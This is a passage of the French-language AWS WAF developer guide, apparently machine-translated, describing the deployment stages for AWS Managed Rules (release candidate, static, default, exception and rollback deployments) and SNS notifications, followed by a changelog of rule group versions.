Pour les déploiements qui affectent vos protections, tels que les modifications apportées à la version par défaut, AWS fournit des notifications SNS pour vous informer des déploiements planifiés et pour vous indiquer quand un déploiement commence. Pour les déploiements qui n'affectent pas vos protections, tels que les déploiements de versions candidates et de versions statiques, vous pouvez AWS être averti une fois le déploiement commencé ou même une fois celui-ci terminé. Une fois le déploiement d'une nouvelle version statique terminé, AWS met à jour ce guide, dans le journal des modifications [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) et dans la page d'historique du document à l'adresse. [Historique du document](doc-history.md) 

Pour recevoir toutes les AWS mises à jour relatives aux groupes de règles AWS gérées, abonnez-vous au flux RSS depuis n'importe quelle page HTML de ce guide et abonnez-vous à la rubrique SNS relative aux groupes de règles AWS gérées. Pour plus d'informations sur l'abonnement aux notifications SNS, consultez. [Être informé des nouvelles versions et des mises à jour d'un groupe de règles géré](waf-using-managed-rule-groups-sns-topic.md)

**Contenu des notifications SNS**  
Les champs des notifications Amazon SNS incluent toujours l'objet, le message et. MessageAttributes Les champs supplémentaires dépendent du type de message et du groupe de règles géré auquel la notification est destinée. Voici un exemple de liste de notifications pour`AWSManagedRulesCommonRuleSet`.

```
{
    "Type": "Notification",
    "MessageId": "4286b830-a463-5e61-bd15-e1ae72303868",
    "TopicArn": "arn:aws:sns:us-west-2:123456789012:MyTopic",
    "Subject": "New version available for rule group AWSManagedRulesCommonRuleSet",
    "Message": "Welcome to AWSManagedRulesCommonRuleSet version 1.5! We've updated the regex specification in this version to improve protection coverage, adding protections against insecure deserialization. For details about this change, see http://updatedPublicDocs.html. Look for more exciting updates in the future! ",
    "Timestamp": "2021-08-24T11:12:19.810Z",
    "SignatureVersion": "1",
    "Signature": "EXAMPLEHXgJm...",
    "SigningCertURL": "https://sns.us-west-2.amazonaws.com/SimpleNotificationService-f3ecfb7224c7233fe7bb5f59f96de52f.pem",
    "SubscribeURL": "https://sns.us-west-2.amazonaws.com/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-west-2:123456789012:MyTopic&Token=2336412f37...",
    "MessageAttributes": {
        "major_version": {
            "Type": "String",
            "Value": "v1"
        },
        "managed_rule_group": {
            "Type": "String",
            "Value": "AWSManagedRulesCommonRuleSet"
        }
    }
}
```

# Vue d'ensemble des déploiements standard pour les règles AWS gérées
<a name="waf-managed-rule-groups-deployments-standard"></a>

AWS déploie de nouvelles fonctionnalités de règles AWS gérées en trois étapes de déploiement standard : version candidate, version statique et version par défaut. 

Le schéma suivant décrit ces déploiements standard. Chacune est décrite plus en détail dans les sections qui suivent. 

![\[Quatre couloirs de nage verticaux présentent différentes étapes de déploiement standard. Le swimlane le plus à gauche montre la version par défaut définie sur la version statique recommandée 1.4. Le deuxième swimlane indique que la version par défaut est une version Release Candidate (RC) à des fins de test et de réglage. La version RC contient 1.4 règles et règles RC. Une note indique qu'après le test, la version statique recommandée est rétablie par défaut. Le troisième swimlane montre la création d'une version statique 1.5 à partir des règles de la version candidate à la publication. Le quatrième swimlane montre la version par défaut définie sur la nouvelle version statique recommandée 1.5.\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/images/amr-rg-versions-flowchart-diagram.png)


# États de version typiques pour les règles AWS gérées
<a name="waf-managed-rule-groups-typical-version-states"></a>

Normalement, un groupe de règles géré versionné possède un certain nombre de versions statiques non expirées, et la version par défaut pointe vers la version statique recommandée. AWS La figure suivante montre un exemple d'ensemble typique de versions statiques et de paramètres de version par défaut. 

![\[Trois versions statiques Version_1.2, Version_1.3 et Version_1.4 sont empilées, avec Version_1.4 en haut. La version 1.4 comporte deux règles, RuleA et RuleB, toutes deux comportant une action de production. Un indicateur de version par défaut pointe vers Version_1.4.\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/images/amr-rg-versions-diagram.png)


L'action de production pour la plupart des règles d'une version statique l'estBlock, mais elle peut être définie différemment. Pour des informations détaillées sur les paramètres d'action des règles, consultez la liste des règles pour chaque groupe de règles à l'adresse[AWS Liste des groupes de règles gérées](aws-managed-rule-groups-list.md). 

# Publiez des déploiements candidats pour les règles AWS gérées
<a name="waf-managed-rule-groups-deployments-release-candidate"></a>

Cette section explique le fonctionnement d'un déploiement de version candidate à une version temporaire.

Lorsqu'un ensemble de règles candidat AWS est modifié pour un groupe de règles géré, il les teste dans le cadre d'un déploiement de version temporaire candidate. AWS évalue les règles candidates en mode comptage par rapport au trafic de production et effectue les dernières activités de réglage, notamment en atténuant les faux positifs. AWS les tests publient les règles candidates de cette manière pour tous les clients qui utilisent la version par défaut du groupe de règles. Les déploiements de versions candidates ne s'appliquent pas aux clients qui utilisent une version statique du groupe de règles.

Si vous utilisez la version par défaut, le déploiement d'une version candidate ne modifiera pas la façon dont votre trafic Web est géré par le groupe de règles. Vous remarquerez peut-être ce qui suit lors du test des règles relatives aux candidats : 
+ Le nom de version par défaut passe de `Default (using Version_X.Y)` à`Default (using Version_X.Y_PLUS_RC_COUNT)`. 
+ Indicateurs de comptage supplémentaires sur Amazon CloudWatch avec leur nom `RC_COUNT` dans leur nom. Elles sont générées par les règles des versions candidates.

AWS teste une version candidate pendant environ une semaine, puis la supprime et rétablit la version par défaut sur la version statique actuellement recommandée. 

AWS exécute les étapes suivantes pour le déploiement d'une version candidate : 

1. **Créer la version candidate** : AWS ajoute une version candidate en fonction de la version statique actuellement recommandée, qui est la version vers laquelle pointe la version par défaut. 

   Le nom de la version candidate est le nom de version statique auquel est ajouté. `_PLUS_RC_COUNT` Par exemple, si la version statique actuellement recommandée est la version statique`Version_2.1`, la version candidate sera nommée`Version_2.1_PLUS_RC_COUNT`.

   La version candidate contient les règles suivantes : 
   + Règles copiées exactement à partir de la version statique actuellement recommandée, sans modification de la configuration des règles. 
   + Nouvelles règles candidates dont l'action est définie sur Count et dont les noms se terminent par`_RC_COUNT`. 

     La plupart des règles candidates proposent des améliorations aux règles qui existent déjà dans le groupe de règles. Le nom de chacune de ces règles est le nom de la règle existante auquel est ajouté. `_RC_COUNT` 

1. **Définissez la version par défaut sur la version candidate et testez** : AWS définit la version par défaut pour qu'elle pointe vers la nouvelle version candidate, afin d'effectuer des tests par rapport à votre trafic de production. Les tests prennent généralement environ une semaine.

    Vous verrez le nom de la version par défaut passer de celui qui indique uniquement la version statique, par exemple`Default (using Version_1.4)`, à un nom qui indique la version statique plus les règles relatives aux versions candidates, telles que`Default (using Version_1.4_PLUS_RC_COUNT)`. Ce schéma de dénomination vous permet d'identifier la version statique que vous utilisez pour gérer votre trafic Web. 

   Le schéma suivant montre l'état des exemples de versions de groupes de règles à ce stade.   
![\[En haut de la figure se trouvent trois versions statiques empilées, avec Version_1.4 en haut. La version Version_1.4_Plus_RC_Count est séparée de la pile de versions statiques. Cette version contient les règles de Version_1.4 et contient également deux règles candidates à la version, RuleB_RC_Count et Rulez_RC_Count, toutes deux dotées d'une action de comptage. L'indicateur de version par défaut pointe vers Version_1.4_Plus_RC_Count.\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/images/amr-rg-versions-rc-diagram.png)

   Les règles des versions candidates sont toujours configurées avec des Count actions, de sorte qu'elles ne modifient pas la façon dont le groupe de règles gère le trafic Web. 

   Les règles relatives aux versions candidates génèrent des indicateurs de CloudWatch comptage Amazon qui sont AWS utilisés pour vérifier le comportement et identifier les faux positifs. AWS effectue les ajustements nécessaires, pour ajuster le comportement des règles de dénombrement des candidats à la publication. 

   La version candidate n'est pas une version statique et vous ne pouvez pas la choisir dans la liste des versions de groupes de règles statiques. Vous pouvez uniquement voir le nom de la version candidate dans la spécification de version par défaut.

1. **Rétablir la version par défaut à la version statique recommandée** : après avoir testé les règles de la version candidate AWS , rétablit la version par défaut sur la version statique recommandée actuelle. Le paramètre de nom de version par défaut supprime la `_PLUS_RC_COUNT` fin et le groupe de règles arrête de générer des mesures de CloudWatch nombre pour les règles des versions candidates. Il s'agit d'une modification silencieuse, différente du déploiement d'une restauration de version par défaut.

   Le schéma suivant montre l'état des exemples de versions de groupes de règles une fois le test de la version candidate terminé.   
![\[Il s'agit encore une fois de la version typique des états chiffrés. Trois versions statiques Version_1.2, Version_1.3 et Version_1.4 sont empilées avec Version_1.4 en haut. La version 1.4 comporte deux règles, RuleA et RuleB, toutes deux comportant une action de production. Un indicateur de version par défaut pointe vers Version_1.4.\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/images/amr-rg-versions-rc-complete-diagram.png)

**Calendrier et notifications**  
AWS déploie les versions candidates selon les besoins, afin de tester les améliorations apportées à un groupe de règles. 
+ **SNS** — AWS envoie une notification SNS au début du déploiement. La notification indique la durée estimée pendant laquelle la version candidate sera testée. Lorsque le test est terminé, AWS rétablit silencieusement le paramètre de version statique par défaut, sans autre notification.
+ **Journal des modifications** : AWS ne met pas à jour le journal des modifications ni les autres parties de ce guide pour ce type de déploiement.

# Déploiements de versions statiques pour les règles AWS gérées
<a name="waf-managed-rule-groups-deployments-static-version"></a>

Lorsqu'il est AWS déterminé qu'une version candidate apporte des modifications importantes au groupe de règles, AWS déploie une nouvelle version statique pour le groupe de règles en fonction de la version candidate. Ce déploiement ne modifie pas la version par défaut du groupe de règles. 

La nouvelle version statique contient les règles suivantes issues de la version candidate : 
+ Règles issues de la version statique précédente qui n'ont pas de candidat de remplacement parmi les règles des versions candidates. 
+ Publiez les règles relatives aux candidats, avec les modifications suivantes : 
  + AWS modifie le nom de la règle en supprimant le suffixe `_RC_COUNT` de la version candidate.
  + AWS remplace les actions de règle par Count leurs actions de règles de production. 

   Pour les règles candidates qui remplacent des règles existantes, cela remplace les fonctionnalités des règles précédentes dans la nouvelle version statique. 

Le schéma suivant illustre la création de la nouvelle version statique à partir de la version candidate. 

![\[En haut de la figure figure la version candidate Version_1.4_Plus_RC_Count, avec les mêmes règles que dans la figure de déploiement de la version candidate précédente. La version contient les règles de Version_1.4 ainsi que les règles candidates RuleB_RC_Count et Rulez_RC_Count, toutes deux dotées d'une action de comptage. En dessous, au bas de la figure se trouve une version statique Version_1.5, qui contient les règles RuleA, RuleB et RuleZ, toutes avec une action de production. Les flèches pointent de la version RC vers Version_1.5 pour indiquer que la règle A est copiée à partir des règles de la version 1.4 et que la règle B et la règle Z sont copiées à partir des règles de la version candidate. Toutes les règles de la version 1.5 comportent des actions de production.\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/images/amr-rg-versions-create-static-diagram.png)


Après le déploiement, la nouvelle version statique est disponible pour que vous puissiez la tester et l'utiliser dans vos protections si vous le souhaitez. Vous pouvez consulter les actions et les descriptions des règles nouvelles et mises à jour dans les listes de règles du groupe de règles à l'adresse[AWS Liste des groupes de règles gérées](aws-managed-rule-groups-list.md). 

Une version statique est immuable après le déploiement et ne change que lorsqu'elle AWS expire. Pour plus d'informations sur les cycles de vie des versions, consultez[Utilisation de groupes de règles gérés versionnés dans AWS WAF](waf-managed-rule-groups-versioning.md).

**Chronométrage et notifications**  
AWS déploie une nouvelle version statique selon les besoins, afin de déployer des améliorations aux fonctionnalités des groupes de règles. Le déploiement d'une version statique n'a aucune incidence sur le paramètre de version par défaut.
+ **SNS** — AWS envoie une notification SNS lorsque le déploiement est terminé.
+ **Journal des modifications** : une fois le déploiement terminé partout où cela AWS WAF est disponible, AWS met à jour la définition du groupe de règles dans ce guide selon les besoins, puis annonce la publication dans le journal des modifications du groupe de règles AWS Managed Rules et sur la page d'historique de la documentation. 

# Déploiements de versions par défaut pour AWS Managed Rules
<a name="waf-managed-rule-groups-deployments-default-version"></a>

Lorsqu'il est AWS déterminé qu'une nouvelle version statique fournit une meilleure protection au groupe de règles par rapport à la version par défaut actuelle, AWS met à jour la version par défaut vers la nouvelle version statique. AWS peut publier plusieurs versions statiques avant de promouvoir l'une d'entre elles vers la version par défaut du groupe de règles. 

Le schéma suivant montre l'état des exemples de versions de groupes de règles après le AWS déplacement du paramètre de version par défaut vers la nouvelle version statique. 

![\[Ceci est similaire à la figure typique des états de version, mais avec Version_1.5 en haut de la pile et l'indicateur par défaut pointant vers celui-ci.\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/images/amr-rg-versions-new-default-diagram.png)


Avant de déployer cette modification dans la version par défaut, AWS fournit des notifications afin que vous puissiez tester et préparer les modifications à venir. Si vous utilisez la version par défaut, vous ne pouvez effectuer aucune action et y rester pendant toute la durée de la mise à jour. Si vous souhaitez plutôt retarder le passage à la nouvelle version, avant le début prévu du déploiement de la version par défaut, vous pouvez configurer explicitement votre groupe de règles pour qu'il utilise la version statique définie par défaut. 

**Chronométrage et notifications**  
AWS met à jour la version par défaut lorsqu'il recommande une version statique différente de celle actuellement utilisée pour le groupe de règles. 
+ **SNS** : AWS envoie une notification SNS au moins une semaine avant le jour de déploiement ciblé, puis une autre le jour du déploiement, au début du déploiement. Chaque notification inclut le nom du groupe de règles, la version statique vers laquelle la version par défaut est mise à jour, la date de déploiement et le calendrier prévu du déploiement pour chaque AWS région dans laquelle la mise à jour est effectuée. 
+ **Journal des modifications** : AWS ne met pas à jour le journal des modifications ni les autres parties de ce guide pour ce type de déploiement.

# Déploiements exceptionnels pour les règles AWS gérées
<a name="waf-managed-rule-groups-deployments-exceptions"></a>

AWS peut contourner les étapes de déploiement standard afin de déployer rapidement les mises à jour qui répondent aux risques de sécurité critiques. Un déploiement exceptionnel peut impliquer l'un des types de déploiement standard, et il peut être déployé rapidement dans les AWS régions. 

AWS fournit une notification aussi avancée que possible pour les déploiements d'exceptions. 

**Calendrier et notifications**  
AWS effectue des déploiements d'exceptions uniquement lorsque cela est nécessaire. 
+ **SNS** : AWS envoie une notification SNS aussi longtemps que possible avant le jour de déploiement ciblé, puis une autre au début du déploiement. Chaque notification inclut le nom du groupe de règles, les modifications apportées et la date de déploiement. 
+ **Journal des modifications** : si le déploiement concerne une version statique, une fois le déploiement terminé partout où cela AWS WAF est disponible, AWS met à jour la définition du groupe de règles dans ce guide selon les besoins, puis annonce la publication dans le journal des modifications du groupe de règles AWS gérées et sur la page d'historique de la documentation. 

# Annulations de déploiement par défaut pour les règles AWS gérées
<a name="waf-managed-rule-groups-deployments-default-rollbacks"></a>

Dans certaines conditions, AWS peut rétablir les paramètres précédents de la version par défaut. Une annulation prend généralement moins de dix minutes pour toutes les AWS régions.

AWS effectue une annulation uniquement pour atténuer un problème important dans une version statique, tel qu'un niveau inacceptable de faux positifs. 

Après l'annulation du paramètre de version par défaut, AWS accélère à la fois l'expiration de la version statique présentant le problème et la publication d'une nouvelle version statique pour résoudre le problème. 

**Chronométrage et notifications**  
AWS effectue des annulations de version par défaut uniquement lorsque cela est nécessaire. 
+ **SNS** : AWS envoie une seule notification SNS au moment de l'annulation. La notification inclut le nom du groupe de règles, la version pour laquelle la version par défaut est définie et la date de déploiement. Ce type de déploiement étant très rapide, la notification ne fournit pas d'informations temporelles pour les régions. 
+ **Journal des modifications** : AWS ne met pas à jour le journal des modifications ni les autres parties de ce guide pour ce type de déploiement.

# AWS Journal des modifications des règles gérées
<a name="aws-managed-rule-groups-changelog"></a>

Cette section répertorie les modifications apportées aux règles AWS gérées AWS WAF depuis leur publication en novembre 2019.

**Note**  
Ce journal des modifications indique les modifications apportées aux règles et aux groupes de règles dans AWS Managed Rules for. AWS WAF  
Pour le[Groupes de règles de réputation IP](aws-managed-rule-groups-ip-rep.md), ce journal des modifications indique les modifications apportées aux règles et au groupe de règles, ainsi que les modifications importantes apportées aux sources des listes d'adresses IP utilisées par les règles. Il ne signale pas les modifications apportées aux listes d'adresses IP elles-mêmes, en raison de la nature dynamique de ces listes. Si vous avez des questions concernant les listes d'adresses IP, contactez votre responsable de compte ou ouvrez un dossier auprès [AWS Support du Center](https://console.aws.amazon.com/support/home#/). 


| Groupe de règles et règles | Description | Date | 
| --- | --- | --- | 
| [Groupe de règles géré par une application PHP](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-php-app) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html) |  A publié la version statique 2.2 de ce groupe de règles.  Détections améliorées et `PHPHighRiskMethodsVariables_URIPATH` règle ajoutée.  | 24/03/2026/ | 
| [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md) Nouvelles règles : [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  |  A publié la version statique 5.0 de ce groupe de règles. Ajout de plus de 400 nouveaux robots dans plusieurs catégories, dont deux nouvelles catégories de robots avec leurs règles respectives : Page Preview et Webhooks. **Améliorations clés** Précision améliorée des signaux de détection des robots et correspondance des modèles de robots génériques, ce qui se traduit par une classification plus précise du trafic.  Cette mise à jour modifie la façon dont le groupe de règles géré priorise la détection des bots. Les modèles de bots spécifiques non vérifiés sont désormais évalués avant les modèles génériques et les signaux de détection. Cela signifie que les demandes sont plus susceptibles d'être classées en fonction de leurs caractéristiques les plus spécifiques plutôt que d'indicateurs génériques. **Ce que cela signifie pour votre trafic :** Le modèle de bot générique correspondra désormais moins fréquemment. Ces modèles ne s'appliquent que lorsqu'aucune règle de bot plus spécifique n'a déjà identifié le trafic. Cela réduit la surclassification et garantit que les demandes sont étiquetées avec l'identification de bot la plus précise disponible. Les signaux de détection, tels que les indicateurs indiquant qu'une demande provient d'un fournisseur de services cloud, d'un centre de données connu sous forme de bot ou qu'elle utilise un agent utilisateur autre que le navigateur, sont désormais appliqués après les règles d'identification des robots. Cela garantit que les classifications spécifiques des robots ont la priorité sur les feux de circulation génériques. **Impact :** Vous verrez peut-être moins d'étiquettes pour les modèles de bots génériques dans vos journaux de trafic, car les demandes sont désormais classées avec plus de précision selon des règles de bot spécifiques. Cela permet de mieux comprendre la nature réelle de votre trafic automatisé et de réduire le bruit causé par une correspondance de modèles trop large. Les classifications de bots non vérifiées seront plus visibles et plus précises, ce qui vous aidera à mieux comprendre et gérer les demandes automatisées adressées à vos applications. **Remarque :** Cette version inclut les mises à jour `awswaf:managed:aws:bot-control:bot:web_bot_auth` des étiquettes et des règles depuis Version\$14.0, mais la `Web Bot Auth` fonctionnalité n'est toujours disponible que dans. CloudFront  | 25/02/2026/ | 
| [Groupe de règles géré par le système d'exploitation POSIX](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-posix-os)  |  A publié la version statique 3.2 de ce groupe de règles.  Signatures de détection améliorées pour toutes les règles.  | 15-01-2026/ | 
| [Groupe de règles géré pour les entrées erronées connues](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-known-bad-inputs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  |  A publié la version statique 1.25 de ce groupe de règles. Mise à jour du `ReactJSRCE_BODY` pour améliorer la détection.  | 2025-12-08 | 
| [Groupe de règles géré par le système d'exploitation POSIX](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-posix-os)  |  A publié la version statique 3.1 de ce groupe de règles.  Signatures de détection améliorées pour toutes les règles.  | 2025-12-08 | 
| [Groupe de règles géré pour les entrées erronées connues](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-known-bad-inputs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  |  A publié la version statique 1.24 de ce groupe de règles. Mise à jour du `ReactJSRCE_BODY` pour améliorer la détection.  | 04/12/2025 | 
| [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md) Nouveaux labels :[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html) Champ d'application : CloudFront |  Déploiement de la nouvelle version statique `AWSManagedRulesBotControlRuleSet` Version\$14.0 avec prise en charge de l'authentification par bot Web (WBA) pour la vérification cryptographique des robots. Cette version doit être sélectionnée de manière explicite et ne met pas automatiquement à jour les déploiements existants à l'aide de la version par défaut. Nouvelles fonctionnalités : [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html) Mises à jour des règles : [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  Version\$14.0 est une version statique uniquement ; elle ne modifie pas le comportement de la version par défaut. Pour utiliser les fonctionnalités WBA, sélectionnez explicitement la version \$14.0 lors de la configuration de votre ACL Web.   | 20-11-2025 | 
| [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md) Nouvelles étiquettes de robots vérifiées :Publicité :[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)IA :[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)Récupérateur de contenu :[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)Médias sociaux :[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html) |  Principales améliorations :  [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  Les règles relatives aux catégories de robots dans Bot Control ne se déclenchent que sur les robots non vérifiés, à l'exception de CategoryAI qui se déclenche également sur les robots vérifiés. Version\$13.3 est une version statique uniquement, elle ne modifie pas le comportement de la version par défaut.   | 17/11/2025 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  |  A publié la version statique 1.20 de ce groupe de règles.  Signatures de détection améliorées pour les règles SSRF (Server Side Request Forgery).  | 02/10/2025 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  |  A publié la version statique 1.19 de ce groupe de règles.  Signatures de détection améliorées pour les règles de script intersites.  | 14/08/2025 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  |  A publié la version statique 1.18 de ce groupe de règles.  Signatures de détection améliorées pour les règles de script intersites.  | 18/06/2025 | 
| [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md) Nouveaux labels : [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  |  A publié la version statique 3.2 de ce groupe de règles.  Les nouvelles étiquettes répertoriées ont été ajoutées.   | 29/05/2025 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  |  A publié la version statique 1.17 de ce groupe de règles.  Signatures de détection améliorées pour les règles de script intersites.  | 03/03/2025 | 
| [Groupe de règles géré par base de données SQL](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-sql-db) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.3 de ce groupe de règles.  Ajout d'une double transformation de `URL_DECODE_UNI` texte aux règles répertoriées.  | 24-01-2025 | 
| [Groupe de règles géré par le système d'exploitation Linux](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-linux-os) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 2.6 de ce groupe de règles.  Signatures ajoutées pour améliorer la détection.   | 24-01-2025 | 
| [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md) Nouvelle étiquette de nom de bot dans les étiquettes Bot Control : `awswaf:managed:aws:bot-control:bot::name:nytimes`  | A publié la version statique 3.1 de ce groupe de règles.  L'étiquette du New York Times a été ajoutée à la liste des étiquettes de noms de robots.   | 07/11/2024 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.16 de ce groupe de règles.  Signatures de détection améliorées pour les règles de script intersites.   | 16/10/2024 | 
| [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md) Nouvelles règles : [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html) Règles supprimées : [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html) Nouveaux labels : [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html) Étiquetage supplémentaire dans les règles existantes.  | A publié les versions statiques 2.0 et 3.0 de ce groupe de règles. La version 2.0 est identique à la version 3.0, mais les actions des règles pour toutes les nouvelles règles sont définies surCount. Ce guide décrit la dernière version de chaque groupe de règles.  Les nouvelles règles listées ont été ajoutées.  Étiquetage mis à jour afin que toutes les règles appliquent une étiquette avec le motif`awswaf:managed:aws:bot-control:<RuleName>`.  Ajout d'étiquettes de fournisseur de services cloud aux étiquettes de signal Bot Control.  Ajout de nouvelles étiquettes de nom de bot qui sont inspectées selon les règles des catégories de robots.   | 13/09/2024 | 
| [AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md) Toutes les règles  | A publié la version statique 1.1 de ce groupe de règles.  Étiquetage mis à jour afin que toutes les règles appliquent une étiquette avec le motif`awswaf:managed:aws:atp:<RuleName>`.   | 13/09/2024 | 
| [AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md) Toutes les règles  | A publié la version statique 1.1 de ce groupe de règles.  Étiquetage mis à jour afin que toutes les règles appliquent une étiquette avec le motif`awswaf:managed:aws:acfp:<RuleName>`.   | 13/09/2024 | 
| [Groupe de règles géré par le système d'exploitation Linux](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-linux-os) Toutes les règles  | A publié la version statique 2.5 de ce groupe de règles.  Signatures ajoutées pour améliorer la détection.   | 02/09/2024 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.15 de ce groupe de règles.  Signatures de détection améliorées pour les règles LFI génériques.   | 30/08/2024/ | 
| [Groupe de règles géré par le système d'exploitation Windows](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-windows-os) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 2.3 de ce groupe de règles.  Signatures de détection ajustées dans les règles répertoriées afin de réduire les faux positifs.   | 28/08/2024/ | 
| [WordPress groupe de règles géré par les applications](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-wordpress-app) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.3 de ce groupe de règles.  La transformation de texte JS\$1DECODE a été ajoutée à la règle répertoriée.   | 15/07/2024 | 
| [Groupe de règles géré par le système d'exploitation Linux](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-linux-os) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 2.4 de ce groupe de règles.  La transformation de texte JS\$1DECODE a été ajoutée à la règle répertoriée.   | 12/07/2024 | 
| [Groupe de règles géré par un ensemble de règles de base (CRS)](aws-managed-rule-groups-baseline.md#aws-managed-rule-groups-baseline-crs) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 1.14 de ce groupe de règles.  La transformation de texte JS\$1DECODE a été ajoutée aux règles répertoriées.   | 2024-07-09 | 
| [Groupe de règles géré par une application PHP](aws-managed-rule-groups-use-case.md#aws-managed-rule-groups-use-case-php-app) [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-changelog.html)  | A publié la version statique 2.1 de ce groupe de règles.  La transformation de texte JS\$1DECODE a été ajoutée aux règles répertoriées.   | 2024-07-03 | 
